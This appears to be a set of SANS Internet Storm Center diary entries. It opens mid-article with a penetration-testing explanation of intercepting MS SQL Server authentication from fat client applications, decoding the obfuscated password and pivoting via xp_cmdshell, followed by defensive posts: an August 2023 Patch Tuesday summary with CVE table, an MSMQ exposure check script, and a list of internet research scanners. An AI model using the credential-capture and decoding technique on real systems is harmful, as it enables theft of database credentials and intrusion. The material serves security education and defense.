- The fat client application will use a single (usually quite powerful) account to login to the MS SQL database server, using the SQL Server authentication protocol
- Now the end user will be required to authenticate locally by the fat client application (this is usually a login screen displayed by the fat client application)
- The fat client application will verify if the entered username/password pair is correct (again, by checking something in the database)
- If everything goes well, the user has been authenticated and the fat client application will display the corresponding GUI
You can probably already see a critical step here: that single account used by the fat client application to log in to the MS SQL database server.
This must be heavily guarded. I’ve seen examples where these credentials were stored in a plain text configuration file or in the registry, but also cases where they were encrypted and the encryption algorithm was heavily obfuscated (Borland, I’m looking at you).
Of course, for an attacker, getting these credentials is one of their primary goals, since they will usually allow full access to the database, as well as potential lateral movement by exploiting the target systems further.
So how do we get the username and password if they are encrypted in the configuration? If we just monitor network traffic, they will still not be visible, as modern SQL Server databases will encrypt the authentication exchange (see above), no matter if the rest of the encryption is turned off. In other words, we can see SQL queries after authentication, but we will not be able to see the exchanged username and password, which means that we must dig deeper.
Authentication MitM
As the authentication part will be encrypted, we will want to somehow obtain this information in plain text (or whatever it is, as we will see later). There are a couple of ways to do this, and here are my favorite methods.
Depending on the application, sometimes the easiest way will be to inject into the fat client application and monitor data before it’s passed for encryption. There are several tools that you can use for this, which require more or less experience:
- Frida (https://frida.re/) is a very powerful dynamic instrumentation toolkit that will allow you to instrument almost anything in the target application. It’s very popular in mobile application penetration testing but we can use it here as well.
- Echo Mirage – the original tool that will allow you to hook SSL/TLS libraries and inspect network traffic before it’s being encrypted (for outgoing traffic), and after it’s being decrypted (for incoming traffic). I still tend to use this tool quite a bit as it simply works, even on the latest Windows (despite being 20 years old).
- Hallucinate (https://github.com/SySS-Research/hallucinate/), a tool originally based on Echo Mirage and Frida, that might be more stable.
Besides this, we might also run a MitM attack on the network. If there is no certificate pinning in the fat client application, the tool of choice will usually be mitmproxy (https://mitmproxy.org/); I suggest that you check out the mitmdump command-line interface and the WireGuard mode.
No matter which of the tools above is used, the goal is to capture the username/password pair while the fat client application authenticates to the target MS SQL database. And if we succeed, we might be a bit disappointed: even after defeating network encryption, the password is still not passed in plaintext, and we might see something like this:
plaintextusername 0x00 A2A5B3A592A592A5D2A553A582A5E3A5 0x00
Defeating 20-year-old obfuscation
The highlighted bytes above probably contain the password, but it is indeed not in plaintext. That being said, this looks like obfuscation rather than encryption: notice how one byte value (0xA5) appears quite often.
20 years ago David Litchfield, a great researcher (hands up if you were on the Bugtraq mailing list back then), published a paper detailing how this obfuscation works. There was a small bug in it that was corrected, and it is remarkable that the same algorithm is still used today (talk about backward compatibility). So what MS SQL Server does with a password is the following:
- Convert the password to the Unicode character set; this will result in “extending” an ASCII password with null bytes (0x00)
- Swap the upper and lower nibble (4 bits) of every byte
- XOR every byte with 0xA5
Not too difficult, right? With this in mind, we can easily take the obfuscated password we retrieved from the wire and decode it. I wrote a very simple Python script to do that, which is available at https://github.com/bojanisc/SQLAuthDecrypt. Let's try it:
$ SQLAuthDecrypt.py
Enter encrypted password: A2A5B3A592A592A5D2A553A582A5E3A5
Decrypted password: password
Nice! We got the plaintext password of the main account used by our fat client application. Now it’s time to try to perform some lateral movement, perhaps beginning with utilizing xp_cmdshell.
Finally, how do we prevent this? Well, one solution is easy: do not use SQL Server authentication, but instead have users authenticate with their Windows credentials. This opens a can of worms with the application shown above, as it would probably require substantial re-engineering of the application, and I guess that this is one of the reasons why we still see these vulnerabilities 20 years after they were published.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
ISC Stormcast For Thursday, August 10th, 2023 https://isc.sans.edu/podcastdetail/8610, (Thu, Aug 10th)
ISC Stormcast For Wednesday, August 9th, 2023 https://isc.sans.edu/podcastdetail/8608, (Wed, Aug 9th)
Microsoft August 2023 Patch Tuesday, (Tue, Aug 8th)
This month we got patches for 88 vulnerabilities. Of these, 6 are critical, and 2 are already being exploited, according to Microsoft.
One of the exploited vulnerabilities is the .NET and Visual Studio Denial of Service Vulnerability (CVE-2023-38180). Its maximum severity is Important and its CVSS score is 7.5.
The other exploited item is the Microsoft Office Defense in Depth Update (ADV230003). According to the advisory, this defense-in-depth update does not address a vulnerability in itself, but installing it stops the attack chain leading to the Windows Search security feature bypass vulnerability (CVE-2023-36884). Microsoft recommends installing the Office updates discussed in the advisory as well as the Windows updates from August 2023.
Moving to the critical vulnerabilities, there are Remote Code Execution (RCE) vulnerabilities affecting Microsoft Message Queuing (CVE-2023-35385, CVE-2023-36910, and CVE-2023-36911). According to the advisory, the Windows Message Queuing service, which is a Windows component, needs to be enabled for a system to be exploitable. This feature can be added via the Control Panel. You can check whether a service named Message Queuing is running and whether TCP port 1801 is listening on the machine. Successful exploitation could allow an unauthenticated attacker to remotely execute code on the target server. The attack complexity is low, and no privileges or user interaction are required. The CVSS score for these vulnerabilities is 9.8.
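The two checks the paragraph suggests (is a Message Queuing service running, is TCP/1801 listening) as an added Python example; this is not from the advisory. It parses the text that `sc query` and `netstat -ano -p tcp` print on Windows, so the parsing functions can be exercised on the constructed sample output embedded below, and only the `__main__` block actually runs the tools. The short service name `MSMQ` is the well-known Windows name for Message Queuing, not something the diary states.

```python
"""Is the Message Queuing prerequisite for the MSMQ RCE bugs present?

Added example for the Patch Tuesday summary above, not Microsoft's guidance.
"""
import re
import subprocess
import sys

MSMQ_SERVICE = "MSMQ"       # display name "Message Queuing"; assumed short name
MSMQ_TCP_PORT = 1801        # port named in the advisory text above


def service_is_running(sc_query_output: str) -> bool:
    """Parse `sc query <name>` text; True when the STATE line reads RUNNING."""
    m = re.search(r"STATE\s*:\s*\d+\s+(\w+)", sc_query_output)
    return m is not None and m.group(1).upper() == "RUNNING"


def port_is_listening(netstat_output: str, port: int = MSMQ_TCP_PORT) -> bool:
    """Parse `netstat -ano -p tcp` text; True when any TCP socket bound to
    `port` (0.0.0.0:1801, [::]:1801, 127.0.0.1:1801, ...) is LISTENING."""
    for line in netstat_output.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0].upper() != "TCP":
            continue
        local, state = cols[1], cols[3]
        if state.upper() == "LISTENING" and local.rsplit(":", 1)[-1] == str(port):
            return True
    return False


def assess(sc_output: str, netstat_output: str) -> str:
    """Combine both checks into one verdict for an inventory report."""
    running = service_is_running(sc_output)
    listening = port_is_listening(netstat_output)
    if running and listening:
        return "exposed"                    # patch now, or remove the feature
    if running or listening:
        return "partial"                    # inconsistent state, look closer
    return "not-installed-or-stopped"


# Constructed sample outputs shaped like the real tools' text (for offline use).
SAMPLE_SC_RUNNING = """SERVICE_NAME: MSMQ
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
"""
SAMPLE_SC_MISSING = (
    "[SC] EnumQueryServicesStatus:OpenService FAILED 1060:\n\n"
    "The specified service does not exist as an installed service.\n"
)
SAMPLE_NETSTAT = """  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:1801           0.0.0.0:0              LISTENING       2468
  TCP    192.0.2.10:49700       198.51.100.5:443       ESTABLISHED     3120
"""

if __name__ == "__main__":
    if sys.platform != "win32":
        print(assess(SAMPLE_SC_RUNNING, SAMPLE_NETSTAT), "(sample data)")
    else:
        sc = subprocess.run(["sc", "query", MSMQ_SERVICE],
                            capture_output=True, text=True).stdout
        ns = subprocess.run(["netstat", "-ano", "-p", "tcp"],
                            capture_output=True, text=True).stdout
        print(assess(sc, ns))
```

A host that reports "exposed" is the one the critical MSMQ CVEs apply to; "not-installed-or-stopped" still wants the patch, but is not remotely reachable through this service.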
August 2023 Security Updates
Description | CVE / Advisory | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
-- no title -- | CVE-2023-35945 | No | No | - | - | - | 7.5 | 7.5
.NET Core and Visual Studio Denial of Service Vulnerability | CVE-2023-38178 | No | No | - | - | Important | 7.5 | 6.5
.NET Framework Spoofing Vulnerability | CVE-2023-36873 | No | No | - | - | Important | 7.4 | 6.7
.NET and Visual Studio Denial of Service Vulnerability | CVE-2023-38180 | No | Yes | - | - | Important | 7.5 | 6.7
.NET and Visual Studio Remote Code Execution Vulnerability | CVE-2023-35390 | No | No | - | - | Important | 7.8 | 7.0
AMD: CVE-2023-20569 Return Address Predictor | CVE-2023-20569 | No | No | - | - | Important | - | -
ASP.NET Core SignalR and Visual Studio Information Disclosure Vulnerability | CVE-2023-35391 | No | No | - | - | Important | 7.1 | 6.4
ASP.NET Elevation of Privilege Vulnerability | CVE-2023-36899 | No | No | - | - | Important | 7.5 | 6.7
Azure Apache Ambari Spoofing Vulnerability | CVE-2023-36881 | No | No | - | - | Important | 4.5 | 3.9
Azure Apache Hadoop Spoofing Vulnerability | CVE-2023-38188 | No | No | - | - | Important | 4.5 | 3.9
Azure Apache Hive Spoofing Vulnerability | CVE-2023-35393 | No | No | - | - | Important | 4.5 | 3.9
Azure Apache Oozie Spoofing Vulnerability | CVE-2023-36877 | No | No | - | - | Important | 4.5 | 3.9
Azure Arc-Enabled Servers Elevation of Privilege Vulnerability | CVE-2023-38176 | No | No | - | - | Important | 7.0 | 6.1
Azure DevOps Server Spoofing Vulnerability | CVE-2023-36869 | No | No | - | - | Important | 6.3 | 6.0
Azure HDInsight Jupyter Notebook Spoofing Vulnerability | CVE-2023-35394 | No | No | - | - | Important | 4.6 | 4.0
Chromium: CVE-2023-4068 Type Confusion in V8 | CVE-2023-4068 | No | No | - | - | - | - | -
Chromium: CVE-2023-4069 Type Confusion in V8 | CVE-2023-4069 | No | No | - | - | - | - | -
Chromium: CVE-2023-4070 Type Confusion in V8 | CVE-2023-4070 | No | No | - | - | - | - | -
Chromium: CVE-2023-4071 Heap buffer overflow in Visuals | CVE-2023-4071 | No | No | - | - | - | - | -
Chromium: CVE-2023-4072 Out of bounds read and write in WebGL | CVE-2023-4072 | No | No | - | - | - | - | -
Chromium: CVE-2023-4073 Out of bounds memory access in ANGLE | CVE-2023-4073 | No | No | - | - | - | - | -
Chromium: CVE-2023-4074 Use after free in Blink Task Scheduling | CVE-2023-4074 | No | No | - | - | - | - | -
Chromium: CVE-2023-4075 Use after free in Cast | CVE-2023-4075 | No | No | - | - | - | - | -
Chromium: CVE-2023-4076 Use after free in WebRTC | CVE-2023-4076 | No | No | - | - | - | - | -
Chromium: CVE-2023-4077 Insufficient data validation in Extensions | CVE-2023-4077 | No | No | - | - | - | - | -
Chromium: CVE-2023-4078 Inappropriate implementation in Extensions | CVE-2023-4078 | No | No | - | - | - | - | -
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2023-38170 | No | No | - | - | Important | 7.8 | 6.8
Memory Integrity System Readiness Scan Tool Defense in Depth Update | ADV230004 | Yes | No | - | - | Moderate | - | -
Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability | CVE-2023-35389 | No | No | - | - | Important | 6.5 | 5.7
Microsoft Dynamics Business Central Elevation Of Privilege Vulnerability | CVE-2023-38167 | No | No | - | - | Important | 7.2 | 6.3
Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | CVE-2023-38157 | No | No | Less Likely | Less Likely | Moderate | 6.5 | 5.7
Microsoft Excel Remote Code Execution Vulnerability | CVE-2023-36896 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Exchange Remote Code Execution Vulnerability | CVE-2023-35368 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Exchange Server Elevation of Privilege Vulnerability | CVE-2023-21709 | No | No | - | - | Important | 9.8 | 8.5
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2023-38185 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2023-35388 | No | No | - | - | Important | 8.0 | 7.0
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2023-38182 | No | No | - | - | Important | 8.0 | 7.0
Microsoft Exchange Server Spoofing Vulnerability | CVE-2023-38181 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Message Queuing Denial of Service Vulnerability | CVE-2023-36909 | No | No | - | - | Important | 6.5 | 5.7
Microsoft Message Queuing Denial of Service Vulnerability | CVE-2023-36912 | No | No | - | - | Important | 7.5 | 6.5
Microsoft Message Queuing Denial of Service Vulnerability | CVE-2023-35376 | No | No | - | - | Important | 6.5 | 5.7
Microsoft Message Queuing Denial of Service Vulnerability | CVE-2023-38254 | No | No | - | - | Important | 6.5 | 5.7
Microsoft Message Queuing Denial of Service Vulnerability | CVE-2023-35377 | No | No | - | - | Important | 6.5 | 5.7
Microsoft Message Queuing Denial of Service Vulnerability | CVE-2023-38172 | No | No | - | - | Important | 7.5 | 6.5
Microsoft Message Queuing Information Disclosure Vulnerability | CVE-2023-36913 | No | No | - | - | Important | 6.5 | 5.7
Microsoft Message Queuing Information Disclosure Vulnerability | CVE-2023-35383 | No | No | - | - | Important | 7.5 | 6.5
Microsoft Message Queuing Remote Code Execution Vulnerability | CVE-2023-36910 | No | No | - | - | Critical | 9.8 | 8.5
Microsoft Message Queuing Remote Code Execution Vulnerability | CVE-2023-36911 | No | No | - | - | Critical | 9.8 | 8.5
Microsoft Message Queuing Remote Code Execution Vulnerability | CVE-2023-35385 | No | No | - | - | Critical | 9.8 | 8.5
Microsoft OLE DB Remote Code Execution Vulnerability | CVE-2023-38169 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Office Defense in Depth Update | ADV230003 | Yes | Yes | - | - | Moderate | - | -
Microsoft Office Remote Code Execution Vulnerability | CVE-2023-35371 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Office Visio Remote Code Execution Vulnerability | CVE-2023-36865 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Office Visio Remote Code Execution Vulnerability | CVE-2023-36866 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Office Visio Remote Code Execution Vulnerability | CVE-2023-35372 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Outlook Remote Code Execution Vulnerability | CVE-2023-36895 | No | No | - | - | Critical | 7.8 | 6.8
Microsoft Outlook Spoofing Vulnerability | CVE-2023-36893 | No | No | - | - | Important | 6.5 | 5.7
Microsoft SharePoint Server Information Disclosure Vulnerability | CVE-2023-36890 | No | No | - | - | Important | 6.5 | 5.7
Microsoft SharePoint Server Information Disclosure Vulnerability | CVE-2023-36894 | No | No | - | - | Important | 6.5 | 5.7
Microsoft SharePoint Server Spoofing Vulnerability | CVE-2023-36891 | No | No | - | - | Important | 8.0 | 7.0
Microsoft SharePoint Server Spoofing Vulnerability | CVE-2023-36892 | No | No | - | - | Important | 8.0 | 7.0
Microsoft Teams Remote Code Execution Vulnerability | CVE-2023-29328 | No | No | - | - | Critical | 8.8 | 7.7
Microsoft Teams Remote Code Execution Vulnerability | CVE-2023-29330 | No | No | - | - | Critical | 8.8 | 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | CVE-2023-36882 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Windows Defender Elevation of Privilege Vulnerability | CVE-2023-38175 | No | No | - | - | Important | 7.8 | 6.8
Reliability Analysis Metrics Calculation (RacTask) Elevation of Privilege Vulnerability | CVE-2023-36876 | No | No | - | - | Important | 7.1 | 6.2
Reliability Analysis Metrics Calculation Engine (RACEng) Elevation of Privilege Vulnerability | CVE-2023-35379 | No | No | - | - | Important | 7.8 | 6.8
Tablet Windows User Interface Application Core Remote Code Execution Vulnerability | CVE-2023-36898 | No | No | - | - | Important | 7.8 | 6.8
Visual Studio Tools for Office Runtime Spoofing Vulnerability | CVE-2023-36897 | No | No | - | - | Important | 8.1 | 7.3
Windows Bluetooth A2DP driver Elevation of Privilege Vulnerability | CVE-2023-35387 | No | No | - | - | Important | 8.8 | 7.7
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | CVE-2023-36904 | No | No | - | - | Important | 7.8 | 6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability | CVE-2023-36900 | No | No | - | - | Important | 7.8 | 6.8
Windows Cryptographic Services Information Disclosure Vulnerability | CVE-2023-36906 | No | No | - | - | Important | 5.5 | 4.8
Windows Cryptographic Services Information Disclosure Vulnerability | CVE-2023-36907 | No | No | - | - | Important | 5.5 | 4.8
Windows Fax Service Remote Code Execution Vulnerability | CVE-2023-35381 | No | No | - | - | Important | 8.8 | 7.7
Windows Group Policy Security Feature Bypass Vulnerability | CVE-2023-36889 | No | No | - | - | Important | 5.5 | 4.8
Windows HTML Platforms Security Feature Bypass Vulnerability | CVE-2023-35384 | No | No | - | - | Important | 5.4 | 4.7
Windows Hyper-V Information Disclosure Vulnerability | CVE-2023-36908 | No | No | - | - | Important | 5.7 | 5.0
Windows Kernel Elevation of Privilege Vulnerability | CVE-2023-35359 | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Elevation of Privilege Vulnerability | CVE-2023-35380 | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Elevation of Privilege Vulnerability | CVE-2023-35382 | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Elevation of Privilege Vulnerability | CVE-2023-35386 | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Elevation of Privilege Vulnerability | CVE-2023-38154 | No | No | - | - | Important | 7.8 | 6.8
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | CVE-2023-38184 | No | No | - | - | Important | 7.5 | 6.5
Windows Mobile Device Management Elevation of Privilege Vulnerability | CVE-2023-38186 | No | No | - | - | Important | 7.8 | 6.8
Windows Projected File System Elevation of Privilege Vulnerability | CVE-2023-35378 | No | No | - | - | Important | 7.0 | 6.1
Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability | CVE-2023-36914 | No | No | - | - | Important | 5.5 | 4.8
Windows System Assessment Tool Elevation of Privilege Vulnerability | CVE-2023-36903 | No | No | - | - | Important | 7.8 | 6.8
Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability | CVE-2023-36905 | No | No | - | - | Important | 5.5 | 4.8
See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com/
--
Renato Marinho
Morphus Labs | LinkedIn | Twitter
ISC Stormcast For Tuesday, August 8th, 2023 https://isc.sans.edu/podcastdetail/8606, (Tue, Aug 8th)
Update: Researchers scanning the Internet, (Mon, Aug 7th)
We have been tracking researchers scanning the Internet for open ports or vulnerabilities for a few years. These groups often show up in our "top 10" lists. We do not make any general recommendations to block these IPs but we want to give you the information you need to make this decision for your network.
First, let's talk about what we consider a "researcher". We consider researchers to be organizations that scan the internet for open ports or vulnerabilities without exploiting those vulnerabilities. This does not just include academic researchers; we also count commercial entities as part of this group (Shodan being the most prominent one, in my opinion). For some entities we have very little information and essentially take their word that they are not malicious.
Our API is the easiest way to obtain a list of current "research" IP addresses. See:
https://isc.sans.edu/api/threatcategory/research (not made into a link on purpose; please read the introduction to our API first: https://isc.sans.edu/api). Currently, about 28,000 IPs are part of that list, and we track 30 different entities (not all of them are active).
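One way to put that list to use, as an added Python example (not ISC's code): tag sensor or firewall log entries whose source address is on a saved copy of the research list, so scan noise from known researchers can be counted separately from everything else before you decide whether to block it. The record layout of the saved list (`ip`, `label`, `lastseen`) is an assumption for illustration, not the ISC API's actual schema; the list entries and log lines below are constructed, using documentation-only address ranges.

```python
"""Separate known research scanners from other sources in a small log.

Added example; the JSON layout is an assumed stand-in for a saved API result.
"""
import ipaddress
import json
import re
from collections import Counter

# Constructed stand-in for a saved copy of the research list (field names assumed).
RESEARCH_LIST_JSON = """
[
  {"ip": "198.51.100.7",   "label": "example-scanner-a", "lastseen": "2023-08-07"},
  {"ip": "203.0.113.0/24", "label": "example-scanner-b", "lastseen": "2023-08-06"}
]
"""

# Constructed log lines: "<timestamp> <src_ip> -> <dst_port>/tcp"
SAMPLE_LOG = """\
2023-08-07T10:00:01Z 198.51.100.7 -> 445/tcp
2023-08-07T10:00:02Z 203.0.113.44 -> 22/tcp
2023-08-07T10:00:03Z 192.0.2.10 -> 3389/tcp
2023-08-07T10:00:04Z 198.51.100.7 -> 1433/tcp
"""

LOG_RE = re.compile(r"^\S+\s+(?P<src>[0-9a-fA-F.:]+)\s+->\s+(?P<port>\d+)/tcp$")


def load_research_networks(raw_json):
    """Return a list of (network, label); entries may be single IPs or CIDR blocks."""
    nets = []
    for rec in json.loads(raw_json):
        nets.append((ipaddress.ip_network(rec["ip"], strict=False), rec["label"]))
    return nets


def lookup(ip, nets):
    """Return the research label for `ip`, or None if it is not on the list."""
    addr = ipaddress.ip_address(ip)
    for net, label in nets:
        if addr in net:
            return label
    return None


def classify_log(log_text, nets):
    """Split log lines into per-label research counts and a list of the rest."""
    by_label = Counter()
    other = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that do not fit the format
        label = lookup(m["src"], nets)
        if label:
            by_label[label] += 1
        else:
            other.append((m["src"], int(m["port"])))
    return by_label, other


if __name__ == "__main__":
    research = load_research_networks(RESEARCH_LIST_JSON)
    counts, remaining = classify_log(SAMPLE_LOG, research)
    for label, n in counts.most_common():
        print(f"research {label}: {n} hits")
    print("non-research sources:", remaining)
```

The non-research remainder is what deserves analyst attention; the per-label counts tell you which researcher would be worth contacting if their traffic becomes a problem.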
But the category labels are a bit cryptic, so I explain them in more detail here. Wherever possible, I am quoting each group's own website to describe the service.
Please note: Before starting your own effort to scan the internet for "vulnerability X": Please first reach out to the groups below and try to collaborate.
Label | # of IPs | Last Seen | Description
adscore | 46 | 2023-08-06 | "ADSCORE’s mission is to categorize web traffic that is organically generated or purchased by your business. It detects the following categories of traffic: human, proxy, low quality (obsolete device and/or browser) and of course, bots."
(label not shown) | 1025 | 2023-08-07 | "Governmental Agencies, national CERTs and Security Teams use our Cyber OSINT platform to identify systems which are exposed on the internet and to analyze how widespread new types of vulnerabilities are."
(label not shown) | 257 | 2023-08-07 | Arbor (used to be https://www.arbor-observatory.com/) is now part of Netscout. "The NETSCOUT Threat Intelligence Team's Internet Safety Initiative works to non-intrusively identify systems & services which may be abused by adversaries to launch DDoS attacks. Analysis of the collected data allows us to proactively defend against attacks leveraging any abusable systems. That is the sole focus of this initiative."
(label not shown) | 9222 | 2023-08-06 | "We scan the entire public internet, create real-time threat intelligence streams, and reports that show the exposure of what is connected to the Internet. What is your Internet Attack Surface?"
blindferret | 4 | 2023-08-07 | no details available
(label not shown) | 3073 | 2023-08-07 | "Censys partners with both the private and public sectors to provide the most accurate internet intelligence data available, so teams can uncover risks and take down threats at scale."
(label not shown) | 3 | 2023-08-07 | "The CyberGreen Institute is a 501(c)(3) non-profit organization based in New York that conducts and supports research to establish a science of Cyber Public Health. CyberGreen is a trusted player following transparent methods of identifying sources of risk and best practices for the community. We are committed to evidence-driven metrics and measurements. We welcome collaboration on all fronts. Please contact us to learn more about our organization and how you can be involved with our mission."
(label not shown) | 6 | 2023-08-07 | "Errata Security is a team of dedicated security researchers that practice offensive security. The insight gained from research is delivered to clients through Hacker Eye View reports that cover a variety of topics and real world scenarios."
(label not shown) | 942 | 2023-08-06 | "Cortex Expanse" is operated by Palo Alto Networks. "Automatically, continuously scan the entire internet. Actively discover and index your unknown risks in all connected systems and exposed services."
(label not shown) | 57 | 2023-08-02 | "GDNP layers proprietary and third-party data sets to provide cutting-edge internet research to customers. Our work helps institutions and companies solve data science, business intelligence, and security problems"
(label not shown) | 668 | 2023-08-06 | "Internet Census Group seeks to analyze trends and benchmark security performance across a broad range of industries. We are committed to the education and long-term improvement of security practices across the Internet to provide an ever-stronger defense against the threat of security attacks. The Internet Census Group is led by BitSight Technologies, Inc. and we encourage organizations from industry, government or academia that would like to collaborate on security projects to contact us."
(label not shown) | 359 | 2023-08-06 | "This domain is operated by driftnet.io. It is used to discover and measure services that network owners and operators have publicly exposed. Traffic from this domain is not an attack. Traffic from this domain will never attempt to log in to your systems. Spam is not sent from this domain. SPF, DKIM and DMARC records mark internet-measurement.com as completely unable to send email."
ipip | 210 | 2023-08-07 | no details available
(label not shown) | 153 | 2023-08-07 | "This project goes around the Internet and finds services to index them. We have gathered information on the Internet on the most common security misconfigurations currently open. We intend to provide a platform to fix misconfigurations leading to leaks and security issues by bridging the source, CERTs, hosting companies and researchers to solve the problem."
netsystems | 1281 | 2023-08-07 | no details available
normshield (now known as Black Kite) | 257 | 2023-08-07 | "Our deep insights help you ease the stress of cyber ecosystem risk management. We do this by giving you more than a risk score. Our automated system provides real-time and accurate risk intelligence. Our data is accurate, reliable and detailed so you can improve business resilience by making informed risk decisions across your entire ever-changing cyber ecosystem."
(label not shown) | 130 | 2023-08-06 | "We scan the Internet (and the Dark Web) in a net-neutral manner. That means we scan every exposed asset and your view won't be limited to yours. We even scan the ones you are not aware of..."
(label not shown) | 513 | 2023-08-07 | "Welcome to the automatic IoT scanner. We collect statistics about connected devices. You can see information about connected devices to your IP here."
(label not shown) | 3 | 2023-08-02 | "The objective of Project 25499 is to leverage internet wide scanning to responsibly identify the scope of vulnerabilities as well as provide researchers with resources needed to combat malice."
(label not shown) | 1025 | 2023-08-07 | DDoS protection platform
(label not shown) | 88 | 2023-08-07 | Vulnerability scanning service
(label not shown) | 417 | 2023-08-07 | "Project Sonar started in September of 2013 with the goal of improving security through the active analysis of public networks. While the first few months focused almost entirely on SSL, DNS, and HTTP enumeration, the discoveries and insights derived from these datasets, especially around the identification of systems unknown to IT teams, led to the expansion of Project Sonar to include the scanning of UDP services."
(label not shown) | (not shown) | (not shown) | ".. free and public intelligence gathering service. ... We catalog and fingerprint services in order to track the flow of malware. When we detect such activity, we make every effort to report it to the appropriate person."
(label not shown) | 21 | 2023-08-07 | SecurityScorecard assigns organizations a "security score" similar to a credit score. The internet-wide scans are used as part of that score.
(label not shown) | 561 | 2023-08-07 | "We collect vast amounts of threat data, send tens of thousands of free daily remediation reports, and cultivate strong reciprocal relationships with network providers, national governments and law enforcement. We bring malicious activities and abusable vulnerabilities out of the shadows, expedite their remediation and help to better secure the Internet."
(label not shown) | 68 | 2023-08-07 | "Shodan gathers information about all devices directly connected to the Internet. If a device is directly hooked up to the Internet then Shodan queries it for various publicly-available information. The types of devices that are indexed can vary tremendously: ranging from small desktops up to nuclear power plants and everything in between."
(label not shown) | 231 | 2023-08-06 | The spyse.com website appears to be down right now, but the scanners are still active. For some discussion about Spyse, see https://hackernoon.com/spyse-introduction-cybersecurity-search-engine-for-data-gathering-90763wz8
(label not shown) | 6646 | 2023-08-06 | "Stretchoid is a platform that helps identify an organization's online services." (I recently saw a website providing access to the data collected by Stretchoid, but forgot to write down the name).
univmichigan | 764 | 2023-08-07 | University of Michigan research effort
univsydney | 4 | 2023-08-07 | University of Sydney research effort
---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu
Twitter